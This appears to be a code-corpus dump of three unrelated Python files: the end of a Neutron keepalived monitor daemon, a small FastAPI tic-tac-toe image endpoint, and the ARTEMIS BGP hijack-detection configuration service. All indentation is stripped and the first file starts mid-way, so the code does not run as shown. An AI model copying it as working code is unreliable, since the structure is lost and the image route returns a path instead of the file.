# Note that the message is sent via a Unix domain socket so that
# the URL doesn't matter.
'http://127.0.0.1/',
headers={'X-Neutron-Router-Id': self.router_id,
'X-Neutron-State': state,
'Connection': 'close'},
connection_type=KeepalivedUnixDomainConnection)
if resp.status != 200:
raise Exception(_('Unexpected response: %s') % resp)
LOG.debug('Notified agent router %s, state %s', self.router_id, state)
def handle_sigterm(self, signum, frame):
self.event_stop.set()
self._thread_read_queue.join(timeout=5)
super(MonitorDaemon, self).handle_sigterm(signum, frame)
def configure(conf):
config.register_common_config_options()
config.init(sys.argv[1:])
conf.set_override('log_dir', cfg.CONF.conf_dir)
conf.set_override('debug', True)
conf.set_override('use_syslog', True)
config.setup_logging()
privileged.default.set_client_mode(False)
def main():
keepalived.register_cli_l3_agent_keepalived_opts()
keepalived.register_l3_agent_keepalived_opts()
configure(cfg.CONF)
MonitorDaemon(cfg.CONF.pid_file,
cfg.CONF.router_id,
cfg.CONF.user,
cfg.CONF.group,
cfg.CONF.namespace,
cfg.CONF.conf_dir,
cfg.CONF.monitor_interface,
cfg.CONF.monitor_cidr).start()
|
__init__.py
|
import threading
from fastapi import FastAPI
from fastapi.responses import FileResponse
import uvicorn
import os
from PIL import Image
app = FastAPI()
@app.get('/tictactoe/{gameID}')
async def getGameImage(gameID: str):
folderPath = './modules/tic_tac_toe/src/tictactoe_images'
image = f'{folderPath}/{gameID}.png'
return image
def run():
uvicorn.run(app, port=6060)
def createApp():
apiThread = threading.Thread(target=run)
apiThread.start()
return
|
configuration.py
|
import copy
import multiprocessing as mp
import os
import re
import shutil
import stat
import time
from io import StringIO
from ipaddress import ip_network as str2ip
from typing import Dict
from typing import List
from typing import NoReturn
from typing import Optional
from typing import Text
from typing import TextIO
from typing import Union
import redis
import requests
import ruamel.yaml
import ujson as json
from artemis_utils import ArtemisError
from artemis_utils import flatten
from artemis_utils import get_hash
from artemis_utils import get_logger
from artemis_utils import update_aliased_list
from artemis_utils.constants import AUTOIGNORE_HOST
from artemis_utils.constants import BGPSTREAMHISTTAP_HOST
from artemis_utils.constants import BGPSTREAMKAFKATAP_HOST
from artemis_utils.constants import BGPSTREAMLIVETAP_HOST
from artemis_utils.constants import DATABASE_HOST
from artemis_utils.constants import DETECTION_HOST
from artemis_utils.constants import EXABGPTAP_HOST
from artemis_utils.constants import MITIGATION_HOST
from artemis_utils.constants import NOTIFIER_HOST
from artemis_utils.constants import PREFIXTREE_HOST
from artemis_utils.constants import RIPERISTAP_HOST
from artemis_utils.envvars import IS_KUBERNETES
from artemis_utils.envvars import RABBITMQ_URI
from artemis_utils.envvars import REDIS_HOST
from artemis_utils.envvars import REDIS_PORT
from artemis_utils.envvars import REST_PORT
from artemis_utils.rabbitmq import create_exchange
from artemis_utils.rabbitmq import create_queue
from artemis_utils.redis import ping_redis
from artemis_utils.redis import redis_key
from artemis_utils.service import get_local_ip
from artemis_utils.service import service_to_ips_and_replicas_in_compose
from artemis_utils.service import service_to_ips_and_replicas_in_k8s
from artemis_utils.translations import translate_as_set
from artemis_utils.translations import translate_asn_range
from artemis_utils.translations import translate_rfc2622
from kombu import Connection
from kombu import Consumer
from kombu import Producer
from kombu import uuid
from kombu.mixins import ConsumerProducerMixin
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.web import RequestHandler
# logger
log = get_logger()
# shared memory object locks
shared_memory_locks = {
"data_worker": mp.Lock(),
"config_data": mp.Lock(),
"ignore_fileobserver": mp.Lock(),
}
# global vars
SERVICE_NAME = "configuration"
ALL_CONFIGURABLE_SERVICES = [
SERVICE_NAME,
PREFIXTREE_HOST,
DATABASE_HOST,
NOTIFIER_HOST,
DETECTION_HOST,
MITIGATION_HOST,
RIPERISTAP_HOST,
BGPSTREAMLIVETAP_HOST,
BGPSTREAMKAFKATAP_HOST,
BGPSTREAMHISTTAP_HOST,
EXABGPTAP_HOST,
AUTOIGNORE_HOST,
]
MONITOR_SERVICES = [
RIPERISTAP_HOST,
BGPSTREAMLIVETAP_HOST,
BGPSTREAMKAFKATAP_HOST,
BGPSTREAMHISTTAP_HOST,
EXABGPTAP_HOST,
]
def read_conf(load_yaml=True, config_file=None):
ret_key = None
ret_conf = None
try:
r = requests.get("http://{}:{}/config".format(DATABASE_HOST, REST_PORT))
r_json = r.json()
if r_json["success"]:
if load_yaml:
ret_conf = ruamel.yaml.load(
r_json["raw_config"],
Loader=ruamel.yaml.RoundTripLoader,
preserve_quotes=True,
)
else:
ret_conf = r_json["raw_config"]
ret_key = r_json["key"]
elif config_file:
log.warning(
"could not get most recent configuration from DB, falling back to file"
)
with open(config_file, "r") as f:
raw = f.read()
if load_yaml:
ret_conf = ruamel.yaml.load(
raw, Loader=ruamel.yaml.RoundTripLoader, preserve_quotes=True
)
else:
ret_conf = raw
except Exception:
log.exception("exception")
finally:
return ret_key, ret_conf
def parse(raw: Union[Text, TextIO, StringIO], yaml: Optional[bool] = False):
"""
Parser for the configuration file or string.
The format can either be a File, StringIO or String
"""
try:
if yaml:
data = ruamel.yaml.load(
raw, Loader=ruamel.yaml.RoundTripLoader, preserve_quotes=True
)
# update raw to keep correct format
raw = ruamel.yaml.dump(data, Dumper=ruamel.yaml.RoundTripDumper)
else:
data = raw
data = check(data)
data["timestamp"] = time.time()
# if raw is string we save it as-is else we get the value.
if isinstance(raw, str):
data["raw_config"] = raw
else:
data["raw_config"] = raw.getvalue()
return data, True, None
except Exception as e:
log.exception("exception")
return {"timestamp": time.time()}, False, str(e)
def check(data: Text) -> Dict:
"""
Checks if all sections and fields are defined correctly
in the parsed configuration.
Raises custom exceptions in case a field or section
is misdefined.
"""
if data is None or not isinstance(data, dict):
raise ArtemisError("invalid-data", type(data))
sections = {"prefixes", "asns", "monitors", "rules", "autoignore"}
for section in data:
if section not in sections:
raise ArtemisError("invalid-section", section)
data["prefixes"] = {k: flatten(v) for k, v in data.get("prefixes", {}).items()}
data["asns"] = {k: flatten(v) for k, v in data.get("asns", {}).items()}
data["monitors"] = data.get("monitors", {})
data["rules"] = data.get("rules", [])
data["autoignore"] = data.get("autoignore", {})
check_prefixes(data["prefixes"])
check_monitors(data["monitors"])
check_asns(data["asns"])
check_rules(data["rules"])
check_autoignore(data["autoignore"])
return data
def check_prefixes(_prefixes):
for prefix_group, prefixes in _prefixes.items():
for prefix in prefixes:
if translate_rfc2622(prefix, just_match=True):
continue
try:
str2ip(prefix)
except Exception:
raise ArtemisError("invalid-prefix", prefix)
def check_asns(_asns):
for name, asns in _asns.items():
for asn in asns:
if translate_asn_range(asn, just_match=True):
continue
if not isinstance(asn, int):
raise ArtemisError("invalid-asn", asn)
def check_rules(_rules):
rule_supported_fields = {
"prefixes",
"policies",
"origin_asns",
"neighbors",
"prepend_seq",
"mitigation",
"community_annotations",
}
for rule in _rules:
for field in rule:
if field not in rule_supported_fields:
log.warning("unsupported field found {} in {}".format(field, rule))
rule["prefixes"] = flatten(rule["prefixes"])
for prefix in rule["prefixes"]:
if translate_rfc2622(prefix, just_match=True):
continue
try:
str2ip(prefix)
except Exception:
raise ArtemisError("invalid-prefix", prefix)
rule["origin_asns"] = flatten(rule.get("origin_asns", []))
if rule["origin_asns"] == ["*"]:
rule["origin_asns"] = [-1]
if "neighbors" in rule and "prepend_seq" in rule:
raise ArtemisError("neighbors-prepend_seq-mutually-exclusive", "")
rule["neighbors"] = flatten(rule.get("neighbors", []))
if rule["neighbors"] == ["*"]:
rule["neighbors"] = [-1]
rule["prepend_seq"] = list(map(flatten, rule.get("prepend_seq", [])))
rule["mitigation"] = flatten(rule.get("mitigation", "manual"))
rule["policies"] = flatten(rule.get("policies", []))
rule["community_annotations"] = rule.get("community_annotations", [])
if not isinstance(rule["community_annotations"], list):
raise ArtemisError("invalid-outer-list-comm-annotations", "")
seen_community_annotations = set()
for annotation_entry_outer in rule["community_annotations"]:
if not isinstance(annotation_entry_outer, dict):
raise ArtemisError("invalid-dict-comm-annotations", "")
for annotation in annotation_entry_outer:
if annotation in seen_community_annotations:
raise ArtemisError("duplicate-community-annotation", annotation)
seen_community_annotations.add(annotation)
if not isinstance(annotation_entry_outer[annotation], list):
raise ArtemisError(
"invalid-inner-list-comm-annotations", annotation
)
for annotation_entry_inner in annotation_entry_outer[annotation]:
for key in annotation_entry_inner:
if key not in ["in", "out"]:
raise ArtemisError("invalid-community-annotation-key", key)
in_communities = flatten(annotation_entry_inner.get("in", []))
for community in in_communities:
if not re.match(r"\d+\:\d+", community):
raise ArtemisError("invalid-bgp-community", community)
out_communities = flatten(annotation_entry_inner.get("out", []))
for community in out_communities:
if not re.match(r"\d+\:\d+", community):
raise ArtemisError("invalid-bgp-community", community)
for asn in rule["origin_asns"] + rule["neighbors"]:
if translate_asn_range(asn, just_match=True):
continue
if not isinstance(asn, int):
raise ArtemisError("invalid-asn", asn)
def check_monitors(_monitors):
supported_monitors = {
"riperis",
"exabgp",
"bgpstreamhist",
"bgpstreamlive",
"bgpstreamkafka",
}
available_ris = {
"rrc01",
"rrc02",
"rrc03",
"rrc04",
"rrc05",
"rrc06",
"rrc07",
"rrc08",
"rrc09",
"rrc10",
"rrc11",
"rrc12",
"rrc13",
"rrc14",
"rrc15",
"rrc16",
"rrc17",
"rrc18",
"rrc19",
"rrc20",
"rrc21",
"rrc22",
"rrc23",
"rrc00",
}
available_bgpstreamlive = {"routeviews", "ris", "caida"}
required_bgpstreamkafka = {"host", "port", "topic"}
for key, info in _monitors.items():
if key not in supported_monitors:
raise ArtemisError("invalid-monitor", key)
elif key == "riperis":
if info == [""]:
continue
for unavailable in set(info).difference(available_ris):
log.warning("unavailable monitor {}".format(unavailable))
elif key == "bgpstreamlive":
if not info or not set(info).issubset(available_bgpstreamlive):
raise ArtemisError("invalid-bgpstreamlive-project", info)
elif key == "bgpstreamkafka":
if not set(info.keys()).issubset(required_bgpstreamkafka):
raise ArtemisError(
"invalid-bgpstreamkakfa-configuration", list(info.keys())
)
elif key == "exabgp":
for entry in info:
if "ip" not in entry and "port" not in entry:
raise ArtemisError("invalid-exabgp-info", entry)
# container service IPs will start as follows
if not entry["ip"].startswith("exabgp"):
try:
str2ip(entry["ip"])
except Exception:
raise ArtemisError("invalid-exabgp-ip", entry["ip"])
if not isinstance(entry["port"], int):
raise ArtemisError("invalid-exabgp-port", entry["port"])
if "autoconf" in entry:
if entry["autoconf"] == "true":
entry["autoconf"] = True
elif entry["autoconf"] == "false":
del entry["autoconf"]
else:
raise ArtemisError(
"invalid-exabgp-autoconf-flag", entry["autoconf"]
)
if "learn_neighbors" in entry:
if "autoconf" not in entry:
raise ArtemisError(
"invalid-exabgp-missing-autoconf-for-learn_neighbors",
entry["learn_neighbors"],
)
if entry["learn_neighbors"] == "true":
entry["learn_neighbors"] = True
elif entry["learn_neighbors"] == "false":
del entry["learn_neighbors"]
else:
raise ArtemisError(
"invalid-exabgp-learn_neighbors-flag",
entry["learn_neighbors"],
)
elif key == "bgpstreamhist":
if not isinstance(info, str) or not os.path.exists(info):
raise ArtemisError("invalid-bgpstreamhist-dir", info)
def check_autoignore(_autoignore_rules):
autoignore_supported_fields = {
"thres_num_peers_seen",
"thres_num_ases_infected",
"interval",
"prefixes",
}
for rule_key, rule in _autoignore_rules.items():
for field in rule:
if field not in autoignore_supported_fields:
log.warning("unsupported field found {} in {}".format(field, rule))
if "prefixes" not in rule:
raise ArtemisError("no-prefixes-in-autoignore-rule", rule_key)
rule["prefixes"] = flatten(rule["prefixes"])
for prefix in rule["prefixes"]:
if translate_rfc2622(prefix, just_match=True):
continue
try:
str2ip(prefix)
except Exception:
raise ArtemisError("invalid-prefix", prefix)
field = None
try:
for field in [
"thres_num_peers_seen",
"thres_num_ases_infected",
"interval",
]:
rule[field] = int(rule.get(field, 0))
except Exception:
raise ArtemisError("invalid-value-for-{}".format(field), rule.get(field, 0))
def translate_learn_rule_msg_to_dicts(raw):
"""
Translates a learn rule message payload (raw)
into ARTEMIS-compatible dictionaries
:param raw:
"key": <str>,
"prefix": <str>,
"type": <str>,
"hijack_as": <int>,
}
:return: (<str>rule_prefix, <list><int>rule_asns,
<list><dict>rules)
"""
# initialize dictionaries and lists
rule_prefix = {}
rule_asns = {}
rules = []
try:
# retrieve (origin, neighbor) combinations from redis
redis_hijack_key = redis_key(raw["prefix"], raw["hijack_as"], raw["type"])
hij_orig_neighb_set = "hij_orig_neighb_{}".format(redis_hijack_key)
orig_to_neighb = {}
neighb_to_origs = {}
asns = set()
redis_conn = redis.Redis(host=REDIS_HOST, port=REDIS_PORT)
ping_redis(redis_conn)
if redis_conn.exists(hij_orig_neighb_set):
for element in redis_conn.sscan_iter(hij_orig_neighb_set):
(origin_str, neighbor_str) = element.decode("utf-8").split("_")
origin = None
if origin_str != "None":
origin = int(origin_str)
neighbor = None
if neighbor_str != "None":
neighbor = int(neighbor_str)
if origin is not None:
asns.add(origin)
if origin not in orig_to_neighb:
orig_to_neighb[origin] = set()
if neighbor is not None:
asns.add(neighbor)
orig_to_neighb[origin].add(neighbor)
if neighbor not in neighb_to_origs:
neighb_to_origs[neighbor] = set()
neighb_to_origs[neighbor].add(origin)
# learned rule prefix
rule_prefix = {
raw["prefix"]: "LEARNED_H_{}_P_{}".format(
raw["key"],
raw["prefix"].replace("/", "_").replace(".", "_").replace(":", "_"),
)
}
# learned rule asns
rule_asns = {}
for asn in sorted(list(asns)):
rule_asns[asn] = "LEARNED_H_{}_AS_{}".format(raw["key"], asn)
# learned rule(s)
if re.match(r"^[E|S]\|0.*", raw["type"]):
assert len(orig_to_neighb) == 1
assert raw["hijack_as"] in orig_to_neighb
learned_rule = {
"prefixes": [rule_prefix[raw["prefix"]]],
"origin_asns": [rule_asns[raw["hijack_as"]]],
"neighbors": [
rule_asns[asn] for asn in sorted(orig_to_neighb[raw["hijack_as"]])
],
"mitigation": "manual",
}
rules.append(learned_rule)
elif re.match(r"^[E|S]\|1.*", raw["type"]):
assert len(neighb_to_origs) == 1
assert raw["hijack_as"] in neighb_to_origs
learned_rule = {
"prefixes": [rule_prefix[raw["prefix"]]],
"origin_asns": [
rule_asns[asn] for asn in sorted(neighb_to_origs[raw["hijack_as"]])
],
"neighbors": [rule_asns[raw["hijack_as"]]],
"mitigation": "manual",
}
rules.append(learned_rule)
elif re.match(r"^[E|S]\|-.*", raw["type"]) or re.match(r"^Q\|0.*", raw["type"]):
for origin in sorted(orig_to_neighb):
learned_rule = {
"prefixes": [rule_prefix[raw["prefix"]]],
"origin_asns": [rule_asns[origin]],
"neighbors": [
rule_asns[asn] for asn in sorted(orig_to_neighb[origin])
],
"mitigation": "manual",
}
rules.append(learned_rule)
except Exception:
log.exception("{}".format(raw))
return None, None, None
return rule_prefix, rule_asns, rules
def translate_bgp_update_to_dicts(bgp_update, learn_neighbors=False):
"""
Translates a BGP update message payload
into ARTEMIS-compatible dictionaries
:param learn_neighbors: <boolean> to determine if we should learn neighbors out of this update
:param bgp_update: {
"prefix": <str>,
"key": <str>,
"peer_asn": <int>,
"path": (<int>)<list>
"service": <str>,
"type": <str>,
"communities": [
...,
{
"asn": <int>,
"value": <int>
},
...,
]
"timestamp" : <float>
}
:return: (<str>rule_prefix, <list><int>rule_asns,
<list><dict>rules)
"""
# initialize dictionaries and lists
rule_prefix = {}
rule_asns = {}
rules = []
try:
if bgp_update["type"] == "A":
# learned rule prefix
rule_prefix = {
bgp_update["prefix"]: "AUTOCONF_P_{}".format(
bgp_update["prefix"]
.replace("/", "_")
.replace(".", "_")
.replace(":", "_")
)
}
# learned rule asns
as_path = bgp_update["path"]
origin_asn = None
neighbor = None
asns = set()
if as_path:
origin_asn = as_path[-1]
asns.add(origin_asn)
neighbors = set()
if "communities" in bgp_update and learn_neighbors:
for community in bgp_update["communities"]:
asn = int(community["asn"])
value = int(community["value"])
if asn == origin_asn and value != origin_asn:
neighbors.add(value)
for neighbor in neighbors:
asns.add(neighbor)
rule_asns = {}
for asn in sorted(list(asns)):
rule_asns[asn] = "AUTOCONF_AS_{}".format(asn)
# learned rule
learned_rule = {
"prefixes": [rule_prefix[bgp_update["prefix"]]],
"origin_asns": [rule_asns[origin_asn]],
"mitigation": "manual",
}
if neighbors:
learned_rule["neighbors"] = []
for neighbor in neighbors:
learned_rule["neighbors"].append(rule_asns[neighbor])
rules.append(learned_rule)
else:
# learned rule prefix
rule_prefix = {
bgp_update["prefix"]: "AUTOCONF_P_{}".format(
bgp_update["prefix"]
.replace("/", "_")
.replace(".", "_")
.replace(":", "_")
)
}
except Exception:
log.exception("{}".format(bgp_update))
return None, None, None
return rule_prefix, rule_asns, rules
def get_existing_rules_from_new_rule(yaml_conf, rule_prefix, rule_asns, rule):
try:
# calculate origin asns for the new rule (int format)
new_rule_origin_asns = set()
for origin_asn_anchor in rule["origin_asns"]:
# translate origin asn anchor into integer for quick retrieval
origin_asn = None
for asn in rule_asns:
if rule_asns[asn] == origin_asn_anchor:
origin_asn = asn
break
if origin_asn:
new_rule_origin_asns.add(origin_asn)
# calculate neighbors for the new rule (int format)
new_rule_neighbors = set()
if "neighbors" in rule and rule["neighbors"]:
for neighbor_anchor in rule["neighbors"]:
# translate neighbor anchor into integer for quick retrieval
neighbor = None
for asn in rule_asns:
if rule_asns[asn] == neighbor_anchor:
neighbor = asn
break
if neighbor:
new_rule_neighbors.add(neighbor)
# check existence of rule (by checking the affected prefixes, origin_asns, and neighbors)
existing_rules_found = set()
rule_extension_needed = set()
if "rules" not in yaml_conf:
yaml_conf["rules"] = ruamel.yaml.comments.CommentedSeq()
for i, existing_rule in enumerate(yaml_conf["rules"]):
existing_rule_prefixes = set()
for existing_prefix_seq in existing_rule["prefixes"]:
if isinstance(existing_prefix_seq, str):
existing_rule_prefixes.add(existing_prefix_seq)
continue
for existing_prefix in existing_prefix_seq:
existing_rule_prefixes.add(existing_prefix)
if set(rule_prefix.keys()) == existing_rule_prefixes:
# same prefixes, proceed to origin asn checking
# calculate the origin asns of the existing rule
existing_origin_asns = set()
if "origin_asns" in existing_rule:
for existing_origin_asn_seq in existing_rule["origin_asns"]:
if existing_origin_asn_seq:
if isinstance(existing_origin_asn_seq, int):
existing_origin_asns.add(existing_origin_asn_seq)
continue
for existing_origin_asn in existing_origin_asn_seq:
if existing_origin_asn != -1:
existing_origin_asns.add(existing_origin_asn)
if new_rule_origin_asns == existing_origin_asns:
# same prefixes, proceed to neighbor checking
# calculate the neighbors of the existing rule
existing_neighbors = set()
if "neighbors" in existing_rule:
for existing_neighbor_seq in existing_rule["neighbors"]:
if existing_neighbor_seq:
if isinstance(existing_neighbor_seq, int):
existing_neighbors.add(existing_neighbor_seq)
continue
for existing_neighbor in existing_neighbor_seq:
if existing_neighbor != -1:
existing_neighbors.add(existing_neighbor)
if new_rule_neighbors == existing_neighbors:
# existing rule found, do nothing
existing_rules_found.add(i)
elif not existing_neighbors:
existing_rules_found.add(i)
# rule extension needed if wildcarded neighbors
rule_extension_needed.add(i)
except Exception:
log.exception("exception")
return set(), set()
return existing_rules_found, rule_extension_needed
def get_created_prefix_anchors_from_new_rule(yaml_conf, rule_prefix):
created_prefix_anchors = set()
all_prefixes_exist = True
try:
for prefix in rule_prefix:
prefix_anchor = rule_prefix[prefix]
if "prefixes" not in yaml_conf:
yaml_conf["prefixes"] = ruamel.yaml.comments.CommentedMap()
if prefix_anchor not in yaml_conf["prefixes"]:
all_prefixes_exist = False
yaml_conf["prefixes"][
prefix_anchor
] = ruamel.yaml.comments.CommentedSeq()
yaml_conf["prefixes"][prefix_anchor].append(prefix)
created_prefix_anchors.add(prefix_anchor)
yaml_conf["prefixes"][prefix_anchor].yaml_set_anchor(
prefix_anchor, always_dump=True
)
except Exception:
log.exception("exception")
return set(), False
return created_prefix_anchors, all_prefixes_exist
def get_created_asn_anchors_from_new_rule(yaml_conf, rule_asns):
created_asn_anchors = set()
all_asns_exist = True
try:
for asn in sorted(rule_asns):
asn_anchor = rule_asns[asn]
if "asns" not in yaml_conf:
yaml_conf["asns"] = ruamel.yaml.comments.CommentedMap()
if asn_anchor not in yaml_conf["asns"]:
all_asns_exist = False
yaml_conf["asns"][asn_anchor] = ruamel.yaml.comments.CommentedSeq()
yaml_conf["asns"][asn_anchor].append(asn)
created_asn_anchors.add(asn_anchor)
yaml_conf["asns"][asn_anchor].yaml_set_anchor(asn_anchor, always_dump=True)
except Exception:
log.exception("exception")
return set(), False
return created_asn_anchors, all_asns_exist
def post_configuration_to_other_services(
shared_memory_manager_dict, services=ALL_CONFIGURABLE_SERVICES
):
data = shared_memory_manager_dict["config_data"]
local_ip = get_local_ip()
same_service_only = False
if services == [SERVICE_NAME]:
same_service_only = True
for service in services:
try:
if IS_KUBERNETES:
ips_and_replicas = service_to_ips_and_replicas_in_k8s(service)
else:
ips_and_replicas = service_to_ips_and_replicas_in_compose(
SERVICE_NAME, service
)
except Exception:
log.error("could not resolve service '{}'".format(service))
continue
for replica_name, replica_ip in ips_and_replicas:
try:
# same service (configuration)
if service == SERVICE_NAME:
# do not send the configuration to yourself
if replica_ip == local_ip:
continue
# check if you need to inform the other microservice about the fileobserver ignoring state
ignore_fileobserver = shared_memory_manager_dict[
"ignore_fileobserver"
]
# no need to update data, just notify about fileobserver ignore state
if same_service_only:
r = requests.post(
url="http://{}:{}/config".format(replica_ip, REST_PORT),
data=json.dumps(
{"data": {}, "ignore_fileobserver": ignore_fileobserver}
),
)
else:
r = requests.post(
url="http://{}:{}/config".format(replica_ip, REST_PORT),
data=json.dumps(
{
"data": data,
"ignore_fileobserver": ignore_fileobserver,
}
),
)
else:
r = requests.post(
url="http://{}:{}/config".format(replica_ip, REST_PORT),
data=json.dumps(data),
)
response = r.json()
assert response["success"]
except Exception:
log.error("could not configure service '{}'".format(replica_name))
def write_conf_via_tmp_file(config_file, tmp_file, conf, yaml=True) -> NoReturn:
if IS_KUBERNETES:
return
try:
with open(tmp_file, "w") as f:
if yaml:
ruamel.yaml.dump(conf, f, Dumper=ruamel.yaml.RoundTripDumper)
else:
f.write(conf)
shutil.copymode(config_file, tmp_file)
st = os.stat(config_file)
os.chown(tmp_file, st[stat.ST_UID], st[stat.ST_GID])
os.rename(tmp_file, config_file)
except Exception:
log.exception("exception")
def translate_learn_rule_dicts_to_yaml_conf(
yaml_conf, rule_prefix, rule_asns, rules, withdrawal=False
):
"""
Translates the dicts from translate_learn_rule_msg_to_dicts
function into yaml configuration,
preserving the order and comments of the current file
(edits the yaml_conf in-place)
:param yaml_conf: <dict>
:param rule_prefix: <str>
:param rule_asns: <list><int>
:param rules: <list><dict>
:param withdrawal: <bool>
:return: (<str>, <bool>)
"""
if (withdrawal and not rule_prefix) or (
not withdrawal and (not rule_prefix or not rule_asns or not rules)
):
return "problem with rule installation", False
try:
if rule_prefix and withdrawal:
rules_to_be_deleted = []
for existing_rule in yaml_conf["rules"]:
prefix_seqs_to_be_deleted = []
for existing_prefix_seq in existing_rule["prefixes"]:
if isinstance(existing_prefix_seq, str):
for prefix in rule_prefix:
if existing_prefix_seq == prefix:
prefix_seqs_to_be_deleted.append(existing_prefix_seq)
break
continue
for existing_prefix in existing_prefix_seq:
for prefix in rule_prefix:
if existing_prefix == prefix:
prefix_seqs_to_be_deleted.append(existing_prefix_seq)
break
if len(prefix_seqs_to_be_deleted) == len(existing_rule["prefixes"]):
# same prefixes, rule needs to be deleted
rules_to_be_deleted.append(existing_rule)
elif prefix_seqs_to_be_deleted:
# only the rule prefix(es) need to be deleted
for prefix_seq in prefix_seqs_to_be_deleted:
existing_rule["prefixes"].remove(prefix_seq)
for rule in rules_to_be_deleted:
yaml_conf["rules"].remove(rule)
for prefix_anchor in rule_prefix.values():
if prefix_anchor in yaml_conf["prefixes"]:
del yaml_conf["prefixes"][prefix_anchor]
return "ok", True
# create prefix anchors
created_prefix_anchors, prefixes_exist = get_created_prefix_anchors_from_new_rule(
yaml_conf, rule_prefix
)
# create asn anchors
created_asn_anchors, asns_exist = get_created_asn_anchors_from_new_rule(
yaml_conf, rule_asns
)
# append rules
for rule in rules:
# declare new rules directly for non-existent prefixes (optimization)
if prefixes_exist:
(
existing_rules_found,
rule_update_needed,
) = get_existing_rules_from_new_rule(
yaml_conf, rule_prefix, rule_asns, rule
)
else:
existing_rules_found = []
rule_update_needed = False
# if no existing rule, make a new one
if not existing_rules_found:
rule_map = ruamel.yaml.comments.CommentedMap()
# append prefix
rule_map["prefixes"] = ruamel.yaml.comments.CommentedSeq()
for prefix in rule["prefixes"]:
rule_map["prefixes"].append(yaml_conf["prefixes"][prefix])
# append origin asns
rule_map["origin_asns"] = ruamel.yaml.comments.CommentedSeq()
for origin_asn_anchor in rule["origin_asns"]:
rule_map["origin_asns"].append(yaml_conf["asns"][origin_asn_anchor])
# append neighbors
rule_map["neighbors"] = ruamel.yaml.comments.CommentedSeq()
if "neighbors" in rule and rule["neighbors"]:
for neighbor_anchor in rule["neighbors"]:
rule_map["neighbors"].append(yaml_conf["asns"][neighbor_anchor])
else:
del rule_map["neighbors"]
# append mitigation action
rule_map["mitigation"] = rule["mitigation"]
yaml_conf["rules"].append(rule_map)
# else delete any created anchors (not needed), as long as no rule update is needed
elif not rule_update_needed:
for prefix_anchor in created_prefix_anchors:
del yaml_conf["prefixes"][prefix_anchor]
for asn_anchor in created_asn_anchors:
del yaml_conf["asns"][asn_anchor]
# rule update needed (neighbors)
else:
for existing_rule_found in existing_rules_found:
rule_map = yaml_conf["rules"][existing_rule_found]
if "neighbors" in rule and rule["neighbors"]:
if existing_rule_found in rule_update_needed:
rule_map["neighbors"] = ruamel.yaml.comments.CommentedSeq()
for neighbor_anchor in rule["neighbors"]:
rule_map["neighbors"].append(
yaml_conf["asns"][neighbor_anchor]
)
except Exception:
log.exception("{}-{}-{}".format(rule_prefix, rule_asns, rules))
return (
"problem with rule installation; exception during yaml processing",
False,
)
return "ok", True
class LoadAsSetsHandler(RequestHandler):
"""
REST request handler for loading AS sets.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Receives a "load-as-sets" message, translates the corresponding
as anchors into lists, and rewrites the configuration
:return:
"""
ret_json = {}
try:
(conf_key, yaml_conf) = read_conf(
load_yaml=True,
config_file=self.shared_memory_manager_dict["config_file"],
)
error = False
done_as_set_translations = {}
if "asns" in yaml_conf:
for name in yaml_conf["asns"]:
as_members = []
# consult cache
if name in done_as_set_translations:
as_members = done_as_set_translations[name]
# else try to retrieve from API
elif translate_as_set(name, just_match=True):
ret_dict = translate_as_set(name, just_match=False)
if ret_dict["success"] and "as_members" in ret_dict["payload"]:
as_members = ret_dict["payload"]["as_members"]
done_as_set_translations[name] = as_members
else:
error = ret_dict["error"]
break
if as_members:
new_as_set_cseq = ruamel.yaml.comments.CommentedSeq()
for asn in as_members:
new_as_set_cseq.append(asn)
new_as_set_cseq.yaml_set_anchor(name)
update_aliased_list(
yaml_conf, yaml_conf["asns"][name], new_as_set_cseq
)
if error:
ret_json = {"success": False, "payload": {}, "error": error}
elif done_as_set_translations:
ret_json = {
"success": True,
"payload": {
"message": "All ({}) AS-SET translations done".format(
len(done_as_set_translations)
)
},
"error": False,
}
else:
ret_json = {
"success": True,
"payload": {"message": "No AS-SET translations were needed"},
"error": False,
}
# as-sets were resolved, update configuration
if (not error) and done_as_set_translations:
configure_configuration(
{
"type": "yaml",
"content": ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
),
},
self.shared_memory_manager_dict,
)
except Exception:
log.exception("exception")
ret_json = {"success": False, "payload": {}, "error": "unknown"}
finally:
self.write(ret_json)
class HijackLearnRuleHandler(RequestHandler):
"""
REST request handler for learning hijack rules.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def post(self):
"""
Receives a "learn-rule" message, translates this
to associated ARTEMIS-compatibe dictionaries,
and adds the prefix, asns and rule(s) to the configuration
:param message: {
"key": <str>,
"prefix": <str>,
"type": <str>,
"hijack_as": <int>,
"action": <str> show|approve
}
:return: -
"""
payload = json.loads(self.request.body)
log.debug("payload: {}".format(payload))
ok = False
yaml_conf_str = ""
try:
# load initial YAML configuration
(conf_key, yaml_conf) = read_conf(
load_yaml=True,
config_file=self.shared_memory_manager_dict["config_file"],
)
# translate the BGP update information into ARTEMIS conf primitives
(rule_prefix, rule_asns, rules) = translate_learn_rule_msg_to_dicts(payload)
# create the actual ARTEMIS configuration (use copy in case the conf creation fails)
yaml_conf_clone = copy.deepcopy(yaml_conf)
msg, ok = translate_learn_rule_dicts_to_yaml_conf(
yaml_conf_clone, rule_prefix, rule_asns, rules
)
if ok:
# update running configuration
yaml_conf = copy.deepcopy(yaml_conf_clone)
yaml_conf_str = ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
)
else:
yaml_conf_str = msg
if payload["action"] == "approve" and ok:
# update configuration
configure_configuration(
{
"type": "yaml",
"content": ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
),
},
self.shared_memory_manager_dict,
)
except Exception:
log.exception("exception")
ok = False
finally:
# reply back to the sender with the extra yaml configuration
# message.
self.write({"success": ok, "new_yaml_conf": yaml_conf_str})
def configure_configuration(msg, shared_memory_manager_dict):
ret_json = {}
# ignore file observer if this is a change that we expect and do not need to re-consider
if "origin" in msg and msg["origin"] == "fileobserver":
shared_memory_locks["ignore_fileobserver"].acquire()
# re-instate fileobserver ignoring state to no-ignore
if shared_memory_manager_dict["ignore_fileobserver"]:
shared_memory_manager_dict["ignore_fileobserver"] = False
ret_json = {"success": True, "message": "ignored"}
shared_memory_locks["ignore_fileobserver"].release()
# configure the other configuration service replicas with the current config
# and the new ignore file observer info
post_configuration_to_other_services(
shared_memory_manager_dict, services=[SERVICE_NAME]
)
return ret_json
